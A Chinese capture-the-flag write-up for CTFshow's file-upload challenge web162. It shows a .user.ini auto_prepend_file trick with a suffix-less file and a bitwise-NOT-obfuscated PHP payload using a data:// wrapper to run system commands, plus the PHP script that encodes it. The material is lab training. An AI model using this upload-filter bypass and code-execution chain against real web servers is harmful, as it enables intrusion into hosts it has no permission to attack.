目录

  • 思路
  • 总结

思路

大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过

.user.ini

GIF89aauto_prepend_file=png

png

GIF89a
<?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?>

取反脚本

$a = "data://text/plain,<?php system('tac ../f*');?>";
echo "~(";
for ($i = 0; $i < strlen($a); $i++) {echo "%".bin2hex(~$a[$i]);
}
echo ")";
//%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1

访问upload,拿到flag

总结

我这个算是非预期解了吧

CTFshow 文件上传 web162相关推荐

  1. ctfshow文件上传

    web151-前端绕过 提示前台校验不可靠,上传png图片,burp抓包修改为php 任意命令执行 这里关闭js的话点击上传图片就没有反应了. web152-后端绕过 一模一样的步骤,应该上一题前端判 ...

  2. CTFshow 文件上传 web167

    目录 思路 总结 思路 根据提示上传了包含shell的jpg文件,上传成功,点击下载文件,发现没有存在文件包含点,访问upload检查是否有可执行文件,提示没有权限,但是发现中间件是apache 可以 ...

  3. CTFshow 文件上传 web153

    目录 思路 总结 思路 先上传带shell的png文件,上传成功 把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤, 上传phtml后缀,可以成功上传,但是无法解析,可以试试上 ...

  4. CTFSHOW文件上传篇

    151 绕过前端验证 方法1:直接关闭浏览器的js 方法2:上传.png(没错,只能是png,gif和jpg都不行)文件然后bp抓包后修改后缀,内容为一句话 直接访问upload/1.php然后 po ...

  5. CTFshow 文件上传 web166

    目录 思路 总结 思路 直接在bp发包一直失败,没什么思路,查看了一下网页源代码,提示上传zip 直接上传zip,显示下载文件,抓包发现url路径疑似文件包含点,返回的是一个html页面 在上传的zi ...

  6. CTFshow 文件上传 web156

    目录 思路 总结 思路 这次发现把shell.php改成png上传的时候,提示文件类型不合规,可能对文件头进行检测,可以利用图片马来写入shell. https://github.com/hunter ...

  7. CTFshow 文件上传 web154

    目录 思路 总结 思路 上传一个包含shell的png文件,发现上传失败 清空文件内容,发现上传成功,可能过滤文件中的关键字,经过尝试,猜测文件对php进行过滤,可以用大小写来绕过 shell.png ...

  8. ctfshow 文件上传 web151~170

    目录 web151 web 152 web 153 web 154 web 155 web 156 web 157~159 web 160 web 161 web 162~163 web 164 we ...

  9. CTFshow 文件上传 web165

    目录 思路 总结 思路 上传jpg图片,返回包可以看出经过了二次渲染 试了很多次,群里的jpg哪来也没成功,放弃了 <?php$miniPayload = '<?php echo 123; ...

最新文章

  1. Android Studio 3.5 之后导入第三方Library 库的方法
  2. c-nominated = ((rcheck-use_candidate) || c-nominated);
  3. 【Markdown编辑器】LaTeX公式教程
  4. 阿里云专访Redisson作者Rui Gu:构建开源企业级Redis客户端之路
  5. 如何在Python中安全地创建嵌套目录
  6. 为什么现在还有很多人喜欢在银行存定期?
  7. 2020软考数据库系统工程师-下午案例分析真题解析视频-任铄-专题视频课程
  8. Halcon 第四章『图像特征和提取』◆第2节:基于灰度值特征
  9. 光伏电站清扫机器人_光伏电站清扫机器人_雷曼科林
  10. 【机器学习】决策树实验报告
  11. Android 点击生成二维码
  12. chroot与pivot_root总结 完整的chroot与pivot_root使用例子
  13. 0x80070002(0x80070002错误代码怎么解决)
  14. new String[0]的作用
  15. lucas定理(学习笔记)
  16. 配置FCKeditor出现严重问题,调试时报错:
  17. 在DOS中格式化C盘,及在DOS下硬盘安装windows2003系统
  18. HTML基础学习笔记(1)
  19. JS设置Cookie过期时间(网上非常多错误的方法, expires结果差8小时)
  20. IMD sweet Spot(二)

热门文章

  1. iBatis 的插入一个实体
  2. 【图解】《“十四五”机器人产业发展规划》
  3. USB基础---设备、配置、接口、端点和字符串描述符
  4. S3C6410的IROM启动模式
  5. ppi 各代iphone_算算你的手机 高PPI屏幕显示强机推荐
  6. 关于网络安全几个问题的整理
  7. ConVirt 2.0.1中文汉化版
  8. ios 获得通讯录中联系人的所有属性 亲测,可行 兼容io6 和 ios 7
  9. apache 访问出现403 Forbidden
  10. 十进制转换二进制(原码)